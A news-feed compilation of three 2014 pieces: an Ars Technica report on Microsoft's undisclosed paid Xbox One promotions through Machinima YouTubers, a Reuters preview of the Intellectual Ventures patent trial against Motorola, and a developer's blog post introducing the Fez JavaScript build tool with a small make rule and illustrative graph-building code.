Comments:"Stealth marketing: Microsoft paying YouTubers for Xbox One mentions | Ars Technica"

URL:http://arstechnica.com/gaming/2014/01/stealth-marketing-microsoft-paying-youtubers-for-xbox-one-mentions/


A leaked image from the campaign e-mail sent to Machinima partners.

The line between traditional, paid advertising and organic editorial content on the Internet can sometimes be hazy. A recent stealth promotional campaign between Microsoft and Machinima highlights just how hazy that line has become, and how behind-the-scenes payments can drive ostensibly independent opinion-mongering by users on services like YouTube.

This weekend, word started leaking of a new promotion offering Machinima video partners an additional $3 CPM (i.e., $3 per thousand video views) for posting videos featuring Xbox One content. The promotion was advertised by Machinima's UK community manager in a since-deleted tweet, and it also appears on Machinima's activity feed on Poptent, a clearinghouse for these kind of video marketing campaigns. The Poptent page also mentions an earlier campaign surrounding the Xbox One's launch in November, which offered an additional $1 CPM for videos "promoting the Xbox One and its release games."

To qualify for the campaign (and the extra payments), Machinima partners had to post a video including at least 30 seconds of Xbox One game footage that mentioned the Xbox One by name and included the tag "XB1M13." A YouTube search for that relatively unique term turns up "about 6,590 results," but a quick scan of those results shows only a few hundred that actually seem to be tagged for the Machinima promotion.

These kinds of payments aren't inherently suspect in and of themselves. If the video makers disclosed that Microsoft was paying extra for these videos, and if they were allowed to say whatever they wanted in those videos, then the whole thing could be seen as merely an unorthodox way to increase exposure for the Xbox One on YouTube.

That's not the case, however. According to a leaked copy of the full legal agreement behind the promotion, video creators "may not say anything negative or disparaging about Machinima, Xbox One, or any of its Games" and must keep the details of the promotional agreement confidential in order to qualify for payment. In other words, to get the money, video makers have to speak positively (or at least neutrally) about the Xbox One, and they can't say they're being paid to do so.

The arrangement as described might go against the FTC's guidelines for the use of endorsements in advertising, which demand full disclosure when there is "a connection between the endorser and the seller of the advertised product that might materially affect the weight or credibility of the endorsement." The document offers a specific example of a video game blogger who gets a free game system that he later talks about on his blog. That blogger would need to disclose that gift, the FTC says, because his opinion is "disseminated via a form of consumer-generated media in which his relationship to the advertiser is not inherently obvious." That same reasoning would seem to apply to the opinions expressed by the video makers participating in this promotion. Neither Microsoft nor Machinima responded immediately to a request for comment on the matter, but we'll let you know if and when we hear from them.

This kind of guerrilla online video advertising doesn't seem to be a major part of Microsoft's Xbox One marketing plan. According to the Machinima e-mail, Microsoft agreed to pay only for the first 1.25 million views in the promotion, putting the budget paid to video creators at a mere $3,750 (it's unclear if Machinima itself received any additional funds for facilitating the promotion). Poptent lists the campaign, which started on January 14, as "expired on January 16," suggesting that Microsoft has already reached that desired video view goal. That money may be pulling more than its weight, though, as those videos continue to attract additional views that Microsoft doesn't have to pay for directly.

Whatever you think about the practice, there's reason to believe this kind of stealth promotion of "consumer-generated media" is likely to get more popular going forward. As readers and viewers get better at ignoring explicit, traditional ads—or start blocking them entirely with browser-side scripts—marketers are going to continue to try finding new ways to get their message out there through supposedly unbiased content creators. Something to keep in mind the next time you watch a video or read something from someone who says they're just an average, everyday consumer.

Google set to face Intellectual Ventures in landmark patent trial | Reuters

$
0
0

Comments:" Google set to face Intellectual Ventures in landmark patent trial | Reuters "

URL:http://www.reuters.com/article/2014/01/20/us-google-iv-trial-idUSBREA0J0PC20140120


By Dan Levine

SAN FRANCISCO | Mon Jan 20, 2014 7:13am EST

SAN FRANCISCO (Reuters) - Intellectual Ventures is set to square off this week against Google Inc's Motorola Mobility unit in the first trial that the multibillion-dollar patent-buying firm has undertaken since it was founded.

Privately-held Intellectual Ventures sued Motorola in 2011, claiming the mobile phone maker infringed patents covering a variety of smartphone-related technologies, including Google Play. Motorola has denied the allegations and will now go to trial over three of those patents.

Barring any last-minute settlements, jury selection is scheduled to begin on Tuesday at a federal court in Wilmington, Delaware.

The trial takes place amid an unfolding debate in Congress over patent reform, in which Intellectual Ventures and Google are on opposite sides. Google is backing attempts to curb software patents and make it easier to fight lawsuits, while IV has warned that Congress should not act too rashly to weaken patent owners' rights.

IV and other patent aggregators have faced criticism from some in the technology industry, who argue that patent litigation and royalty payments have become a burdensome tax on innovation. They say firms like IV, which do not primarily make products, are exploiting the patent system.

But IV argues that unlike some of the firms denounced as "patent trolls," it invests only in quality intellectual property and does not file frivolous lawsuits. IV also says it helps inventors get paid for their innovations while helping tech companies protect and manage their intellectual property.

Should the Delaware jury rule against Motorola and uphold IV's patents, it could bolster the firm's argument that it does not buy frivolous patents, said Shubha Ghosh, a University of Wisconsin Law School professor.

Yet a win for Motorola could be held up as evidence that the U.S. government issues too many dubious patents. And even if IV prevails, Google could still argue that patent litigation before a jury of non-expert citizens is akin to a lottery, said Ghosh, who supports patent reform.

"Just because you have a winning ticket doesn't mean it's not still a lottery," he said.

IV and Google both declined to comment on the upcoming trial.

Since its founding in 2000, IV has raised about $6 billion (3.6 billion pounds) from investors and has bought tens of thousands of intellectual property assets from a variety of sources. Google was an investor in IV's first patent acquisition fund, but did not join later vehicles.

IV filed a barrage of lawsuits in 2010 against companies in various sectors, and most defendants have since settled.

THE INVENTORS

Two of the patents in the upcoming Motorola trial cover inventions by Richard Reisman, U.S. government records show. Through his company, Teleshuttle, Reisman has developed several patent portfolios for various technologies, including an online update service, according to the Teleshuttle website.

IV claims that the two Reisman patents cover several of Motorola's older-generation cellphones that have Google Play, a platform for Android smartphone apps. Motorola argues that IV's patents should never have been issued because the inventions were known in the field already.

Reisman did not respond to requests for comment.

One of the patents in play against Motorola has been in a courtroom before. Teleshuttle and a British partner, BTG, sued Microsoft and Apple in 2004 using one of the same patents now in play against Motorola.

In 2006, Teleshuttle and BTG sold their patent rights to Delaware-based Twintech EU LLC for $35 million up front, plus a percentage of future licensing fees, according to BTG's website. At the same time as the sale, BTG and Teleshuttle abruptly withdrew their cases against Apple and Microsoft.

Microsoft and Apple were both early investors in Intellectual Ventures. IV often uses subsidiary companies to buy patents, and then transfer them at a later date to related corporate entities, though public records do not indicate whether IV had an ownership interest in Twintech.

IV took title on the patents from Twintech in September 2011 and sued Motorola a month later, U.S. records show. In a 2011 blog post, Reisman wrote that his deal with IV provided resources "to let me focus on my work as an inventor."

Microsoft declined to comment while Apple did not respond to a request for comment.

Another patent being asserted against Motorola was originally issued to Rajendra Kumar in 2006. Kumar's company, Khyber Technologies, transferred it to Balustare Processing NY LLC in July 2011, which passed it over to IV about a month later, patent records show.

Khyber Technologies was founded in 1991 with the goal of creating the next generation of handheld computing products, according to its website. The patent that IV obtained from Khyber covers detachable handset technology, which IV claims Motorola used in its defunct Lapdock product.

Kumar declined to comment on the IV lawsuit.

If IV wins, damages will be decided at a later proceeding. The trial is expected to last about ten days.

The case in U.S. District Court, District of Delaware is Intellectual Ventures I and Intellectual Ventures II, 11-908.

(Reporting by Dan Levine; editing by Jonathan Weber)

Fezes Are Cool.

$
0
0

Comments:"Fezes Are Cool."

URL:http://isaacbw.com/general/fez/2014/01/20/fezes-are-cool.html


In the world of JavaScript build tools, Grunt is king. Grunt is a task-based build tool, meaning it has no sense of the dependency graph of a project. Tasks are run, one after the other, until there are no more tasks. Grunt excels in the current environment of compilation tools with unpredictable inputs and outputs. Since globs are only resolved when a previous task ends and a new task begins, a task can output whatever it wants, and the next task will pick up on the new files.

There are a few mechanisms, such as Grunt's watch, for rerunning tasks when files change, but even with watch, the entire task will be run. There are no checksums and no timestamp comparisons; Grunt just isn't concerned with minimizing work.

Developers have another option besides task-based tool like Grunt: file-based tools. File-based build tools are extremely popular; make is arguably the most well known and well used file-based build tool, but there are countless others. Rather than defining rulesets with a sequence of tasks to run one after the other to complete a build, a file-based tool allows the developer to define builds as transformational relationships between files. For example, rather than having a task that turns every CoffeeScript file into JavaScript, we look at each CoffeeScript file and create a transformation between the CoffeeScript input and an associated JavaScript output. The difference may seem subtle at first glance, but it becomes incredibly important in defining the nature of the build process.

In short, the idea of a file-based build tool isn't a new one, but it has fallen out of favor as developers have drifted away from the shell. Make and tup both require the use of shell commands to transform files. The problem is that shells can be scary, especially for web developers who rarely venture outside of the browser. I think every developer should be a shell ninja, but I know that probably isn't going to happen. I would advocate that everyone just use make, but there will always be developers who are looking for a lower barrier to entry, and something which is based on tools that developers already know, such as JavaScript.
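
To make that concrete, the CoffeeScript relationship described above, written as a make pattern rule, might look like this (a sketch; it assumes the coffee compiler writes foo.js next to foo.coffee):

%.js: %.coffee
	coffee --compile $<

Powerful, but it lives entirely in shell-command land, which is exactly the barrier described above.
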

Enter Fez.

Fez is a file-based build tool I have been working on loosely based on tup and written in JavaScript. Fez takes the idea of a JavaScript build tool with pluggable operations from Grunt, but goes in a different direction. Builds are defined as sets of rules with three components: the input(s), the output(s), and the operation. An operation is just a function. Unlike Grunt, Fez doesn't do any magic plugin loading. You simply require() the operation function and pass it as an argument to a rule. Here is why this simple rule-based build definition system is awesome: we are able to glob the file system for an initial set of inputs, then construct the entire dependency graph from that set of inputs and the set of rules. For example, say we had the rules:

*.less → %f.css
*.css → %f.min.css
*.min.css → dist.min.css

And given a few starting nodes found on the file system (say, a couple of .less files), Fez is able to construct the entire graph, from beginning to end, from just this information.

Now all we have to do is traverse the graph with a topological sort. We can introduce parallelization of operations where appropriate by executing them in child processes, and then waiting on convergence points. Fez, like make, compares timestamps of inputs and outputs during the graph traversal, allowing Fez to only do the work which needs to be done. Even cleaning the build is made awesome by the build graph: any node with one or more inputs is a generated node, and can be safely removed.
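
To make the graph construction and traversal concrete, here is a toy sketch in plain Node-style JavaScript. It is not Fez's actual API (the rule shape and function names are mine, and the many-to-one concat case is omitted); it only illustrates how rules plus an initial file list expand into a build graph that is then walked in dependency order:

// Toy illustration of rule-based graph construction -- not Fez's real API.
function compileLess(src, dest) { console.log("less:  ", src, "->", dest); }
function minifyCss(src, dest)   { console.log("minify:", src, "->", dest); }

var rules = [
  { match:  function (f) { return /\.less$/.test(f); },
    output: function (f) { return f.replace(/\.less$/, ".css"); },
    op: compileLess },
  { match:  function (f) { return /\.css$/.test(f) && !/\.min\.css$/.test(f); },
    output: function (f) { return f.replace(/\.css$/, ".min.css"); },
    op: minifyCss }
  // a many-to-one rule like *.min.css -> dist.min.css needs a richer rule shape
];

// Expand the rules against the initial inputs; outputs are fed back in,
// since they may themselves match later rules.
function buildGraph(files) {
  var edges = [], queue = files.slice();
  while (queue.length) {
    var file = queue.shift();
    rules.forEach(function (rule) {
      if (rule.match(file)) {
        var out = rule.output(file);
        edges.push({ from: file, to: out, op: rule.op });
        queue.push(out);
      }
    });
  }
  return edges;
}

// Walk the edges in topological order: an edge runs once its input is
// either an original source file or has already been produced.
// (Fez would also compare timestamps here and skip up-to-date outputs.)
function run(files) {
  var produced = {};
  files.forEach(function (f) { produced[f] = true; });
  var remaining = buildGraph(files);
  while (remaining.length) {
    remaining = remaining.filter(function (edge) {
      if (!produced[edge.from]) return true; // not ready yet, try next pass
      edge.op(edge.from, edge.to);
      produced[edge.to] = true;
      return false;
    });
  }
}

run(["main.less", "theme.less"]);
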

Fez is still pretty raw, but it is already usable (and is being used!) in a few real projects, and I would love to hear what people think. Check out the website, the GitHub repository, and/or join us in #fez on Freenode.
